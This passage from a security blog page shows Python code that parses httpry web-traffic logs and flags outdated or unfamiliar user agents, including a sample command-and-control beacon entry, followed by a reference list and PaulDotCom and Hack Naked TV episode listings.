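    ["2011-10-20 09:00:04", "192.0.2.4", "50126", "203.0.113.9", "80", "POST", "203.0.113.9", "/gate.php", "-",
     "Bob's Evil Clown C&C Agent"],
    ["2011-10-20 09:00:05", "192.0.2.5", "50127", "198.51.100.7", "80", "GET", "example.com", "/feed", "-",
     "Roku/DVP-3.0 (013.00E02227A)"],
    ["2011-10-20 09:00:06", "192.0.2.3", "50128", "198.51.100.7", "80", "GET", "example.com", "/", "-", "-"],
])


def parse_httpry(text):
    """Turn httpry lines into dicts keyed by FIELDS, skipping comment lines and
    lines with the wrong number of fields."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) == len(FIELDS):
            rows.append(dict(zip(FIELDS, parts)))
    return rows


def ua_report(rows):
    """Same result as cut -f2,10 | awk '$2 != "-"' | sort | uniq -c | sort -nr:
    a list of ((source-ip, user-agent), count) with the busiest pairs first."""
    counts = Counter((r["source-ip"], r["user-agent"])
                     for r in rows if r["user-agent"] != "-")
    return counts.most_common()


# Assumed site policy, not from the post: Firefox below this major version is
# out of date, and anything not starting with a known prefix gets a second look.
MIN_FIREFOX_MAJOR = 3
KNOWN_PREFIXES = ("Mozilla/", "Opera/", "Wget/", "curl/", "Roku/")
FIREFOX_VERSION = re.compile(r"Firefox/(\d+)\.")


def flag_agents(report):
    """Return (source-ip, user-agent, reason) for agents worth investigating."""
    findings = []
    for (ip, ua), _count in report:
        m = FIREFOX_VERSION.search(ua)
        if m and int(m.group(1)) < MIN_FIREFOX_MAJOR:
            findings.append((ip, ua, "outdated browser"))
        elif not ua.startswith(KNOWN_PREFIXES):
            findings.append((ip, ua, "unrecognised agent"))
    return findings


if __name__ == "__main__":
    report = ua_report(parse_httpry(SAMPLE_HTTPRY))
    for (ip, ua), count in report:
        print("%5d %-10s %s" % (count, ip, ua))
    for ip, ua, reason in flag_agents(report):
        print("FLAG", ip, reason, "->", ua)
```

The prefix allowlist is deliberately crude: its job is to surface the long tail of agents a human has never seen, which is where both the C&C agent and the forgotten wget cron job live.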

    [1] - http://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol

    [2] - http://support.microsoft.com/kb/934864

    [3] - http://dumpsterventures.com/jason/httpry/

    [4] - http://taosecurity.blogspot.com/2008/06/logging-web-traffic-with-httpry.html

    [5] - http://isc.sans.edu/diary.html?storyid=9295

    [6] - http://securityonion.blogspot.com/2011/09/security-onion-20110922-now-available.html

    [7] - http://www.pintumbler.org/Code/hafs

    Join us for Episode 263 featuring an interview with Pwnie Express CEO Dave Porcello and the fine Do-it-yourself UAVers Rich Perkins & Mike Tassey from The Rabbit-Hole to discuss their Wireless Aerial Surveillance Platform.

    Participate in our IRC channel or sit back and enjoy it live via the link below:

    NOTE: The video will play the most recent show up until we are live!

    For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 263 show notes page.

    - Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand, Darren Wigley, and Mike Perez.

    Hack Naked TV Episode 12


    In this episode we talk a lot about malware. We also talk about how traditional defenses are failing, and ladies… We have a smiling Spock.



    Links for this episode:

  • Sony hacked again

  • Zeus now P2P

  • New virtual machine malware vector

  • Your Malware analysis of the day

  • Recursive suck in information security



    To view all Hack Naked TV episodes, please visit http://hacknaked.tv



    PaulDotCom Security Weekly Episode 262 Part 2


    The crew talks about the stories for the week!

    Episode 262 Show Notes

    Episode 262 Part 2 Direct Audio Download

    Episode Hosts:

  • Paul Asadoorian

  • Jack Daniel

  • Larry Pesce

  • John Strand

  • Darren Wigley
  • Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.


    PaulDotCom Security Weekly Episode 262 Part 1


    Charlie Miller, pwn2own champion, Interview:

    Alessandro Acquisti Interview:

    Episode 262 Show Notes

    Episode 262 Part 1 Direct Audio Download

    Episode Hosts:

  • Paul Asadoorian

  • Jack Daniel

  • Larry Pesce

  • John Strand

  • Darren Wigley
  • Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.


    Hack Naked TV Episode 11


    In this episode we talk about Monkey Football love, hot government on malware and malware on government action, how to do responsible disclosure over Twitter.

    Links for this episode:

  • US Drones infected

  • German Malware

  • AMX Backdoor

  • Smartphone security

    To view all Hack Naked TV episodes, please visit http://hacknaked.tv

    Fresh on the heels of an updated iPhone, join us for Episode 262 with an interview of Pwn2Own winner & certified Apple hacker Charlie Miller and be sure to stick around for a guest technical segment with Alessandro Acquisti on Facial Recognition using Augmented Reality.

    Participate in our IRC channel or sit back and enjoy it live via the link below:

    NOTE: The video will play the most recent show up until we are live!

    For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 262 show notes page.

    - Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand, Darren Wigley, and Mike Perez.

    Hack Naked TV - Episode 10


    In this episode we talk about Holes in HTC and how it is much worse than you thought. We talk about Security Through Obscurity and How Linux was P0wned and what you can do about it.


    Links for this episode:

  • Security through obscurity

  • HTC to patch a hole, Android to ignore another

  • Check your Linux Box for Malware

  • Companies plan to hire fewer Security Pros than last year

    To view all Hack Naked TV episodes, please visit http://hacknaked.tv

    PaulDotCom Security Weekly Episode 261


    Brian Kennish on Facebook Privacy:

    Paul and Jack bat around the stories for the week:

    Episode 261 Show Notes

    Episode 261 Direct Audio Download

    Episode Hosts:

  • Paul Asadoorian

  • Jack Daniel
  • Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.


    Hack Naked TV - Episode 9


    In this episode we talk about pigs (three different ones), what CIOs think, more SSL and getting free passwords on used gear. Oh, yea. Google and Microsoft.. Ha! HA!

    Links for this episode:

  • CIOs not fretting about cloud security

  • Pandemonium as Microsoft AV nukes Chrome browser

  • Privacy stink erupts over Borders bankruptcy deal
    To view all Hack Naked TV episodes, please visit http://hacknaked.tv
